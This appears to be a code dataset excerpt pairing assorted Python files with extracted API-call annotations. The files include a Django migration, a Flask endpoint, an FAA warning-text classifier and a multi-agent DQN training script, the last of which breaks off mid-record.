for extension in ["out", "out.map", "out.hex"]:
name = '%s.%s' % (self.app.AppNamePrefix(), extension)
items[name] = os.path.join(self.output_dir, name)
# Figure out flash bundle files and build accordingly
with open(os.path.join(self.output_dir, self.app.FlashBundleName())) as f:
for line in f.readlines():
name = line.strip()
items['flashbundle/%s' %
name] = os.path.join(self.output_dir, name)
return items
| [
"os.path.join",
"enum.auto"
] | [((684, 690), 'enum.auto', 'auto', ([], {}), '()\n', (688, 690), False, 'from enum import Enum, auto\n'), ((702, 708), 'enum.auto', 'auto', ([], {}), '()\n', (706, 708), False, 'from enum import Enum, auto\n'), ((721, 727), 'enum.auto', 'auto', ([], {}), '()\n', (725, 727), False, 'from enum import Enum, auto\n'), ((753, 759), 'enum.auto', 'auto', ([], {}), '()\n', (757, 759), False, 'from enum import Enum, auto\n'), ((3222, 3257), 'os.path.join', 'os.path.join', (['self.output_dir', 'name'], {}), '(self.output_dir, name)\n', (3234, 3257), False, 'import os\n'), ((3550, 3585), 'os.path.join', 'os.path.join', (['self.output_dir', 'name'], {}), '(self.output_dir, name)\n', (3562, 3585), False, 'import os\n')] |
# -*- coding: utf-8 -*-
##############################################################################
# Author:QQ173782910
##############################################################################
import logging
from apscheduler.schedulers.background import BlockingScheduler
from RunUse import TradeRun
format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=format, filename='log_print.txt')
logger = logging.getLogger('print')
logging.getLogger("apscheduler").setLevel(logging.WARNING) # 设置apscheduler.
if __name__ == '__main__':
RunTrade = TradeRun()
scheduler = BlockingScheduler() # 定时的任务.
scheduler.add_job(RunTrade.get_kline_data, trigger='cron', second='*/2') # 主计算k线
scheduler.add_job(RunTrade.get_open_orders, trigger='cron', second='*/2') # 未成交单
scheduler.add_job(RunTrade.get_position, trigger='cron', second='*/1') # 仓位
scheduler.start() | [
"logging.basicConfig",
"apscheduler.schedulers.background.BlockingScheduler",
"logging.getLogger",
"RunUse.TradeRun"
] | [((377, 462), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': 'format', 'filename': '"""log_print.txt"""'}), "(level=logging.INFO, format=format, filename='log_print.txt'\n )\n", (396, 462), False, 'import logging\n'), ((467, 493), 'logging.getLogger', 'logging.getLogger', (['"""print"""'], {}), "('print')\n", (484, 493), False, 'import logging\n'), ((615, 625), 'RunUse.TradeRun', 'TradeRun', ([], {}), '()\n', (623, 625), False, 'from RunUse import TradeRun\n'), ((642, 661), 'apscheduler.schedulers.background.BlockingScheduler', 'BlockingScheduler', ([], {}), '()\n', (659, 661), False, 'from apscheduler.schedulers.background import BlockingScheduler\n'), ((494, 526), 'logging.getLogger', 'logging.getLogger', (['"""apscheduler"""'], {}), "('apscheduler')\n", (511, 526), False, 'import logging\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('wiki_images', '0001_initial'),
]
operations = [
migrations.AlterModelTable(
name='image',
table='wiki_images_image',
),
migrations.AlterModelTable(
name='imagerevision',
table='wiki_images_imagerevision',
),
]
| [
"django.db.migrations.AlterModelTable"
] | [((244, 311), 'django.db.migrations.AlterModelTable', 'migrations.AlterModelTable', ([], {'name': '"""image"""', 'table': '"""wiki_images_image"""'}), "(name='image', table='wiki_images_image')\n", (270, 311), False, 'from django.db import migrations, models\n'), ((356, 444), 'django.db.migrations.AlterModelTable', 'migrations.AlterModelTable', ([], {'name': '"""imagerevision"""', 'table': '"""wiki_images_imagerevision"""'}), "(name='imagerevision', table=\n 'wiki_images_imagerevision')\n", (382, 444), False, 'from django.db import migrations, models\n')] |
# coding: utf-8
from modules.controller import Controller
LED_PIN = 23 # pin of led
if __name__ == "__main__":
controller = Controller(LED_PIN)
controller.run(50, 1)
print("Led Start for a second with 50% power")
| [
"modules.controller.Controller"
] | [((132, 151), 'modules.controller.Controller', 'Controller', (['LED_PIN'], {}), '(LED_PIN)\n', (142, 151), False, 'from modules.controller import Controller\n')] |
from .base import BaseFactory
from launchkey import LAUNCHKEY_PRODUCTION
from launchkey.clients import ServiceClient
class ServiceFactory(BaseFactory):
"""Factory for creating clients when representing a LaunchKey Service Profile"""
def __init__(self, service_id, private_key, url=LAUNCHKEY_PRODUCTION, testing=False, transport=None):
"""
:param service_id: UUID for the requesting service
:param private_key: PEM formatted private key string
:param url: URL for the LaunchKey API
:param testing: Boolean stating whether testing mode is being used. This will determine whether SSL validation
occurs.
:param: transport: Instantiated transport object. The default and currently only supported transport is
launchkey.transports.JOSETransport. If you wish to set encryption or hashing algorithms, this is where you would
do it. IE: JOSETransport(jwt_algorithm="RS512", jwe_cek_encryption="RSA-OAEP",
jwe_claims_encryption="A256CBC-HS512", content_hash_algorithm="S256")
"""
super(ServiceFactory, self).__init__('svc', service_id, private_key, url, testing, transport)
def make_service_client(self):
"""
Retrieves a client to make service calls.
:return: launchkey.clients.ServiceClient
"""
return ServiceClient(self._issuer_id, self._transport)
| [
"launchkey.clients.ServiceClient"
] | [((1369, 1416), 'launchkey.clients.ServiceClient', 'ServiceClient', (['self._issuer_id', 'self._transport'], {}), '(self._issuer_id, self._transport)\n', (1382, 1416), False, 'from launchkey.clients import ServiceClient\n')] |
""" User api endpoints """
from flask import request
from flask_restplus import Resource
from ..util.dto import UserDto
from ..service.user import save_new_user
api = UserDto.api
_user = UserDto.user
@api.route('/users')
class Users(Resource):
"""
User resource for the API
"""
@api.doc('Create a new user')
@api.expect(_user, validate=True)
@api.response(201, 'Successfully registered user')
def post(self):
""" Create new user post method """
data = request.get_json()
return save_new_user(data=data)
| [
"flask.request.get_json"
] | [((502, 520), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (518, 520), False, 'from flask import request\n')] |
import os
import zipfile
from typing import List, Tuple, Dict
import numpy as np
import pandas as pd
import requests
import structlog
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
from tensorflow import keras, one_hot
from tensorflow.keras import layers
from tensorflow.keras.callbacks import CSVLogger
from tensorflow.keras.layers import ReLU
plt.rcParams.update({'figure.figsize': (16.0, 12.0)})
_LOGGER = structlog.get_logger(__file__)
HEADER_COLUMN = 12
LABEL_COLUMN = 'False Warning'
TEXT_COLUMN = 'Text'
def download_file(url: str, local_dir: str = '.', local_filename: str = '') -> str:
"""
Downloads a file from a provided url to a local directory
:param url: URL to download the file from
:param local_dir: Local directory to download the file to (created if it does not exist)
:param local_filename: What to name the file when saved
(if empty or none, assume the name of the original name of the file)
:return: the name of the file which was saved
"""
os.makedirs(f'{local_dir}', exist_ok=True)
local_filename = local_filename if local_filename else url.split('/')[-1]
if os.path.exists(f'{local_dir}/{local_filename}'):
_LOGGER.info(f'{local_dir}/{local_filename} already exists. Skipping download.')
else:
_LOGGER.info(f"Downloading file from {url} to {local_dir}/{local_filename}.")
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(f'./{local_dir}/{local_filename}', 'wb') as f:
for chunk in r.iter_content(chunk_size=128):
f.write(chunk)
_LOGGER.info(f"Finished saving file from {url} to {local_dir}/{local_filename}.")
return f'{local_dir}/{local_filename}'
def unzip_file(path_to_zip_file: str, dir_to_extract_to: str) -> str:
"""
Unzips a zip file to a provided directory
:param path_to_file: path to zip file
:param dir_to_extract_to: directory to extract zip file
:return: full path to unzipped file (assuming there is only one)
"""
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(dir_to_extract_to)
return f'{dir_to_extract_to}/{zip_ref.namelist()[0]}'
def load_data(path_to_file: str) -> pd.DataFrame:
"""
Loads excel data from a supplied path into a Pandas dataframe
:param path_to_file: path to excel file
:return: Pandas dataframe containing contents of excel spreadsheet
"""
_LOGGER.info(f"Started loading the excel data from {path_to_file} into a dataframe - this may take a while. "
f"You may want to grab a coffee.")
df = pd.read_excel(path_to_file, engine='openpyxl', header=HEADER_COLUMN)
_LOGGER.info(f"Finished loading the excel data from {path_to_file} into a dataframe.")
return df
def vectorize(df: pd.DataFrame, **kwargs) -> Tuple[np.array, List[str]]:
_LOGGER.info("Converting text to feature matrix")
vectorizer = TfidfVectorizer(**kwargs)
sparse_matrix = vectorizer.fit_transform(df[TEXT_COLUMN])
feature_matrix = sparse_matrix.todense()
return feature_matrix, vectorizer.get_feature_names()
def extract_and_encode_labels(df: pd.DataFrame) -> Tuple[np.array, Dict[str, int]]:
label_mapping = dict((label, i) for i, label in enumerate(df[LABEL_COLUMN].unique()))
labels = list(df[LABEL_COLUMN].map(label_mapping))
return np.array(labels), label_mapping
if __name__ == "__main__":
local_dir = './data'
compute_features = not os.path.exists(f'{local_dir}/feature_data.csv')
model_type = "knn"
if compute_features:
# download the file
path_to_downloaded_zip_file = download_file(
'https://www.fire.tc.faa.gov/zip/MasterModelVersion3DDeliverable.zip',
local_dir)
# unzip the file
path_to_file = unzip_file(path_to_downloaded_zip_file, local_dir)
# load the file into a Pandas dataframe
df = load_data(path_to_file)
# save preprocessed data to save time for future runs
df.to_csv(f'{local_dir}/feature_data.csv')
else:
# don't go through the hassle of preprocessing if we already have the preprocessed data saved
df = pd.read_csv(f'{local_dir}/feature_data.csv')
count_of_no_text = len(df[df[TEXT_COLUMN].isnull()])
df = df.dropna(subset=[TEXT_COLUMN])
_LOGGER.info(f"Dropped {count_of_no_text} records because {TEXT_COLUMN} was null or NaN")
count_of_null_labels = len(df[df[LABEL_COLUMN].isnull()])
df = df.dropna(subset=[LABEL_COLUMN])
_LOGGER.info(f"Dropped {count_of_null_labels} records because {LABEL_COLUMN} was null or NaN")
# create a sparse feature matrix of size n x m,
# where n = number of documents, m = number of words in vocabulary
feature_matrix, feature_names = vectorize(df, min_df=0.001)
labels, label_mapping = extract_and_encode_labels(df)
num_labels = len(label_mapping)
num_features = feature_matrix.shape[1]
X_train, X_test, y_train, y_test = train_test_split(feature_matrix, labels, test_size=0.05, random_state=1)
_LOGGER.info(f"Training on {X_train.shape[0]} samples, validating on {X_test.shape[0]} samples.")
_LOGGER.info(f"Number of features: {num_features}")
if model_type == "mlp":
labels = one_hot(np.array(labels), len(label_mapping))
inputs = keras.Input(shape=(num_features,))
layer_1 = layers.Dense(8192, activation=ReLU())(inputs)
layer_2 = layers.Dense(2048, activation=ReLU())(layer_1)
layer_3 = layers.Dense(512, activation=ReLU())(layer_2)
layer_4 = layers.Dense(128, activation=ReLU())(layer_3)
layer_5 = layers.Dense(32, activation=ReLU())(layer_4)
layer_6 = layers.Dense(8, activation=ReLU())(layer_5)
outputs = layers.Dense(num_labels, activation="softmax")(layer_6)
model = keras.Model(inputs=inputs, outputs=outputs)
_LOGGER.info(model.summary())
model.compile(
optimizer=keras.optimizers.Adamax(), # Optimizer
loss=keras.losses.CategoricalCrossentropy(), # Loss function to minimize
metrics=[keras.metrics.Accuracy()] # List of metrics to monitor
)
model.fit(X_train, y_train,
validation_data=(X_test, y_test), shuffle=True, epochs=200, batch_size=64,
callbacks=[CSVLogger('./results.csv')])
model.save('model')
elif model_type == "rf":
rf = RandomForestClassifier(n_jobs=-1)
rf.fit(X_train, y_train)
training_acc = rf.score(X_train, y_train)
validation_acc = rf.score(X_test, y_test)
_LOGGER.info(f"Training accuracy with Random Forest: {training_acc}")
_LOGGER.info(f"Validation accuracy with Random Forest: {validation_acc}")
elif model_type == "knn":
knn = KNeighborsClassifier(n_neighbors=5, n_jobs=-1)
knn.fit(X_train, y_train)
training_acc = knn.score(X_train, y_train)
validation_acc = knn.score(X_test, y_test)
_LOGGER.info(f"Training accuracy with kNN: {training_acc}")
_LOGGER.info(f"Validation accuracy with kNN: {validation_acc}") | [
"zipfile.ZipFile",
"pandas.read_csv",
"sklearn.neighbors.KNeighborsClassifier",
"numpy.array",
"tensorflow.keras.layers.Dense",
"pandas.read_excel",
"tensorflow.keras.losses.CategoricalCrossentropy",
"os.path.exists",
"sklearn.model_selection.train_test_split",
"tensorflow.keras.layers.ReLU",
"s... | [((548, 601), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'figure.figsize': (16.0, 12.0)}"], {}), "({'figure.figsize': (16.0, 12.0)})\n", (567, 601), True, 'import matplotlib.pyplot as plt\n'), ((612, 642), 'structlog.get_logger', 'structlog.get_logger', (['__file__'], {}), '(__file__)\n', (632, 642), False, 'import structlog\n'), ((1205, 1247), 'os.makedirs', 'os.makedirs', (['f"""{local_dir}"""'], {'exist_ok': '(True)'}), "(f'{local_dir}', exist_ok=True)\n", (1216, 1247), False, 'import os\n'), ((1333, 1380), 'os.path.exists', 'os.path.exists', (['f"""{local_dir}/{local_filename}"""'], {}), "(f'{local_dir}/{local_filename}')\n", (1347, 1380), False, 'import os\n'), ((2845, 2913), 'pandas.read_excel', 'pd.read_excel', (['path_to_file'], {'engine': '"""openpyxl"""', 'header': 'HEADER_COLUMN'}), "(path_to_file, engine='openpyxl', header=HEADER_COLUMN)\n", (2858, 2913), True, 'import pandas as pd\n'), ((3165, 3190), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {}), '(**kwargs)\n', (3180, 3190), False, 'from sklearn.feature_extraction.text import TfidfVectorizer\n'), ((5228, 5300), 'sklearn.model_selection.train_test_split', 'train_test_split', (['feature_matrix', 'labels'], {'test_size': '(0.05)', 'random_state': '(1)'}), '(feature_matrix, labels, test_size=0.05, random_state=1)\n', (5244, 5300), False, 'from sklearn.model_selection import train_test_split\n'), ((2262, 2300), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path_to_zip_file', '"""r"""'], {}), "(path_to_zip_file, 'r')\n", (2277, 2300), False, 'import zipfile\n'), ((3598, 3614), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (3606, 3614), True, 'import numpy as np\n'), ((3712, 3759), 'os.path.exists', 'os.path.exists', (['f"""{local_dir}/feature_data.csv"""'], {}), "(f'{local_dir}/feature_data.csv')\n", (3726, 3759), False, 'import os\n'), ((4420, 4464), 'pandas.read_csv', 'pd.read_csv', (['f"""{local_dir}/feature_data.csv"""'], {}), "(f'{local_dir}/feature_data.csv')\n", (4431, 4464), True, 'import pandas as pd\n'), ((5569, 5603), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '(num_features,)'}), '(shape=(num_features,))\n', (5580, 5603), False, 'from tensorflow import keras, one_hot\n'), ((6077, 6120), 'tensorflow.keras.Model', 'keras.Model', ([], {'inputs': 'inputs', 'outputs': 'outputs'}), '(inputs=inputs, outputs=outputs)\n', (6088, 6120), False, 'from tensorflow import keras, one_hot\n'), ((1580, 1610), 'requests.get', 'requests.get', (['url'], {'stream': '(True)'}), '(url, stream=True)\n', (1592, 1610), False, 'import requests\n'), ((5514, 5530), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (5522, 5530), True, 'import numpy as np\n'), ((6004, 6050), 'tensorflow.keras.layers.Dense', 'layers.Dense', (['num_labels'], {'activation': '"""softmax"""'}), "(num_labels, activation='softmax')\n", (6016, 6050), False, 'from tensorflow.keras import layers\n'), ((6674, 6707), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ([], {'n_jobs': '(-1)'}), '(n_jobs=-1)\n', (6696, 6707), False, 'from sklearn.ensemble import RandomForestClassifier\n'), ((6204, 6229), 'tensorflow.keras.optimizers.Adamax', 'keras.optimizers.Adamax', ([], {}), '()\n', (6227, 6229), False, 'from tensorflow import keras, one_hot\n'), ((6261, 6299), 'tensorflow.keras.losses.CategoricalCrossentropy', 'keras.losses.CategoricalCrossentropy', ([], {}), '()\n', (6297, 6299), False, 'from tensorflow import keras, one_hot\n'), ((7045, 7091), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {'n_neighbors': '(5)', 'n_jobs': '(-1)'}), '(n_neighbors=5, n_jobs=-1)\n', (7065, 7091), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((5652, 5658), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5656, 5658), False, 'from tensorflow.keras.layers import ReLU\n'), ((5716, 5722), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5720, 5722), False, 'from tensorflow.keras.layers import ReLU\n'), ((5780, 5786), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5784, 5786), False, 'from tensorflow.keras.layers import ReLU\n'), ((5844, 5850), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5848, 5850), False, 'from tensorflow.keras.layers import ReLU\n'), ((5907, 5913), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5911, 5913), False, 'from tensorflow.keras.layers import ReLU\n'), ((5969, 5975), 'tensorflow.keras.layers.ReLU', 'ReLU', ([], {}), '()\n', (5973, 5975), False, 'from tensorflow.keras.layers import ReLU\n'), ((6351, 6375), 'tensorflow.keras.metrics.Accuracy', 'keras.metrics.Accuracy', ([], {}), '()\n', (6373, 6375), False, 'from tensorflow import keras, one_hot\n'), ((6575, 6601), 'tensorflow.keras.callbacks.CSVLogger', 'CSVLogger', (['"""./results.csv"""'], {}), "('./results.csv')\n", (6584, 6601), False, 'from tensorflow.keras.callbacks import CSVLogger\n')] |
# vim: set et nosi ai ts=2 sts=2 sw=2:
# coding: utf-8
from __future__ import absolute_import, print_function, unicode_literals
import unittest
from schwa import dr
class Node(dr.Ann):
label = dr.Field()
class Doc(dr.Doc):
store = dr.Store(Node)
class Test(unittest.TestCase):
def _test_example(self, doc):
doc.store = None
def test_example(self):
R = 'Cannot overwrite a store (.*)'
d = Doc()
d.store.create()
self.assertRaisesRegexp(ValueError, R, lambda: self._test_example(d))
| [
"schwa.dr.Store",
"schwa.dr.Field"
] | [((198, 208), 'schwa.dr.Field', 'dr.Field', ([], {}), '()\n', (206, 208), False, 'from schwa import dr\n'), ((240, 254), 'schwa.dr.Store', 'dr.Store', (['Node'], {}), '(Node)\n', (248, 254), False, 'from schwa import dr\n')] |
#!/usr/bin/env python
import os,sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
import argparse
from multiagent.environment import MultiAgentEnv
import multiagent.scenarios as scenarios
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
from PIL import Image
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(description=None)
parser.add_argument('-s', '--scenario', default='simple.py', help='Path of the scenario Python script.')
args = parser.parse_args()
# load scenario from script
scenario = scenarios.load(args.scenario).Scenario()
# create world
world = scenario.make_world()
# create multiagent environment
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation, info_callback=None, shared_viewer = False)
# render call to create viewer window (necessary only for interactive policies)
env.render()
# execution loop
obs_n = env.reset()
DISCOUNT = 0.99
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 64 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = '2x256'
MIN_REWARD = 20 # For model save
MEMORY_FRACTION = 0.20
# Environment settings
EPISODES = 200
# Exploration settings
epsilon = 1 # not a constant, going to be decayed
EPSILON_DECAY = 0.99975
MIN_EPSILON = 0.001
# Stats settings
AGGREGATE_STATS_EVERY = 50 # episodes
SHOW_PREVIEW = False
# For stats
ep_rewards = [[-200],[-200],[-200]]
# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)
# Memory fraction, used mostly when trai8ning multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.FileWriter(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self,i):
self.index=i
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}-{}".format(MODEL_NAME, self.index,int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self):
model = Sequential()
model.add(Conv2D(256, (3, 3), input_shape=(10, 10, 3))) # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(64))
model.add(Dense(5, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
current_states = np.array([transition[0] for transition in minibatch])/255
current_qs_list = self.model.predict(current_states)
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
new_current_states = np.array([transition[3] for transition in minibatch])/255
future_qs_list = self.target_model.predict(new_current_states)
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
d = {1: (100, 0, 0),
2: (0, 100, 0),
3: (0, 0, 100),
4: (25,25,25)}
def getobs(obsn):
env = np.zeros((10, 10, 3), dtype=np.uint8) # starts an rbg of our size
obs=obsn.copy()
for i in obs:
i=int((i+1)/0.2)
env[int(obs[0])][int(obs[1])][0]+=100 # sets the food location tile to green color
env[int(obs[2])][int(obs[3])][1]+=100
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
img=np.array(img)
return img
def getobsi(obsn):
env = np.zeros((10, 10, 3), dtype=np.uint8) # starts an rbg of our size
obs=obsn.copy()
for i in obs:
i=int((i+1)/0.2)
env[int(obs[2])][int(obs[3])][0]+=100 # sets the food location tile to green color
env[int(obs[4])][int(obs[5])][1]+=100 # sets the enemy location to red
env[int(obs[6])][int(obs[7])][2] +=100 # sets the player tile to blue
env[int(obs[8])][int(obs[9])][0] +=25
env[int(obs[8])][int(obs[9])][1] +=25
env[int(obs[8])][int(obs[9])][2] +=25
env[int(obs[10])][int(obs[11])][0] +=25
env[int(obs[10])][int(obs[11])][1] +=25
env[int(obs[10])][int(obs[11])][2] +=25
env[int(obs[12])][int(obs[13])][0] +=25
env[int(obs[12])][int(obs[13])][1] +=25
env[int(obs[12])][int(obs[13])][2] +=25
img = Image.fromarray(env, 'RGB') # reading to rgb. Apparently. Even tho color definitions are bgr. ???
img=np.array(img)
return img
# create interactive policies for each agent
policies = [DQNAgent(i) for i in range(env.n)]
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
episode_reward=[0,0,0]
step=1
for i, policy in enumerate(policies):
policy.tensorboard.step=episode
# query for action from each agent's policy
obs_n=env.reset()
done = False
while not done:
act_n = []
action_n=[]
for i, policy in enumerate(policies):
act = np.zeros(5)
if np.random.random() > epsilon:
# Get action from Q table
action = np.argmax(policy.get_qs(getobs(obs_n[i])))
else:
# Get random action
action = np.random.randint(0, 5)
act[action]+=1.0
action_n.append(action)
act_n.append(act)
# step environment
newobs_n, reward_n, done_n, _ = env.step(act_n)
if step>=100:
done=True
for i, policy in enumerate(policies):
episode_reward[i]+=reward_n[i]
policy.update_replay_memory((getobs(obs_n[i]), action_n[i], reward_n[i], getobs(newobs_n[i]), done))
policy.train(done, step)
obs_n=newobs_n
step+=1
#if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
if episode % 50==1:
env.render()
for i, policy in enumerate(policies):
ep_rewards[i].append(episode_reward[i])
if not episode % AGGREGATE_STATS_EVERY or episode == 1:
average_reward = sum(ep_rewards[i][-AGGREGATE_STATS_EVERY:])/len(ep_rewards[i][-AGGREGATE_STATS_EVERY:])
min_reward = min(ep_rewards[i][-AGGREGATE_STATS_EVERY:])
max_reward = max(ep_rewards[i][-AGGREGATE_STATS_EVERY:])
policy.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
# Save model, but only when min reward is greater or equal a set value
if min_reward >= MIN_REWARD:
policy.model.save(f'models/{MODEL_NAME+str(policy.index)}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
if epsilon > MIN_EPSILON:
epsilon *= EPSILON_DECAY
epsilon = max(MIN_EPSILON, epsilon)
| [
"keras.layers.Conv2D",
"numpy.array",
"keras.layers.Activation",
"keras.layers.Dense",
"tensorflow.set_random_seed",
"multiagent.environment.MultiAgentEnv",
"collections.deque",
"argparse.ArgumentParser",
"numpy.random.random",
"numpy.max",
"os.path.isdir",
"numpy.random.seed",
"keras.optimi... | [((55, 86), 'os.path.join', 'os.path.join', (['sys.path[0]', '""".."""'], {}), "(sys.path[0], '..')\n", (67, 86), False, 'import os, sys\n'), ((647, 688), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'None'}), '(description=None)\n', (670, 688), False, 'import argparse\n'), ((1017, 1144), 'multiagent.environment.MultiAgentEnv', 'MultiAgentEnv', (['world', 'scenario.reset_world', 'scenario.reward', 'scenario.observation'], {'info_callback': 'None', 'shared_viewer': '(False)'}), '(world, scenario.reset_world, scenario.reward, scenario.\n observation, info_callback=None, shared_viewer=False)\n', (1030, 1144), False, 'from multiagent.environment import MultiAgentEnv\n'), ((2117, 2131), 'random.seed', 'random.seed', (['(1)'], {}), '(1)\n', (2128, 2131), False, 'import random\n'), ((2136, 2153), 'numpy.random.seed', 'np.random.seed', (['(1)'], {}), '(1)\n', (2150, 2153), True, 'import numpy as np\n'), ((2158, 2179), 'tensorflow.set_random_seed', 'tf.set_random_seed', (['(1)'], {}), '(1)\n', (2176, 2179), True, 'import tensorflow as tf\n'), ((2461, 2484), 'os.path.isdir', 'os.path.isdir', (['"""models"""'], {}), "('models')\n", (2474, 2484), False, 'import os, sys\n'), ((2494, 2515), 'os.makedirs', 'os.makedirs', (['"""models"""'], {}), "('models')\n", (2505, 2515), False, 'import os, sys\n'), ((8475, 8512), 'numpy.zeros', 'np.zeros', (['(10, 10, 3)'], {'dtype': 'np.uint8'}), '((10, 10, 3), dtype=np.uint8)\n', (8483, 8512), True, 'import numpy as np\n'), ((8770, 8797), 'PIL.Image.fromarray', 'Image.fromarray', (['env', '"""RGB"""'], {}), "(env, 'RGB')\n", (8785, 8797), False, 'from PIL import Image\n'), ((8881, 8894), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (8889, 8894), True, 'import numpy as np\n'), ((8959, 8996), 'numpy.zeros', 'np.zeros', (['(10, 10, 3)'], {'dtype': 'np.uint8'}), '((10, 10, 3), dtype=np.uint8)\n', (8967, 8996), True, 'import numpy as np\n'), ((9810, 9837), 'PIL.Image.fromarray', 'Image.fromarray', (['env', '"""RGB"""'], {}), "(env, 'RGB')\n", (9825, 9837), False, 'from PIL import Image\n'), ((9921, 9934), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (9929, 9934), True, 'import numpy as np\n'), ((877, 906), 'multiagent.scenarios.load', 'scenarios.load', (['args.scenario'], {}), '(args.scenario)\n', (891, 906), True, 'import multiagent.scenarios as scenarios\n'), ((2833, 2868), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['self.log_dir'], {}), 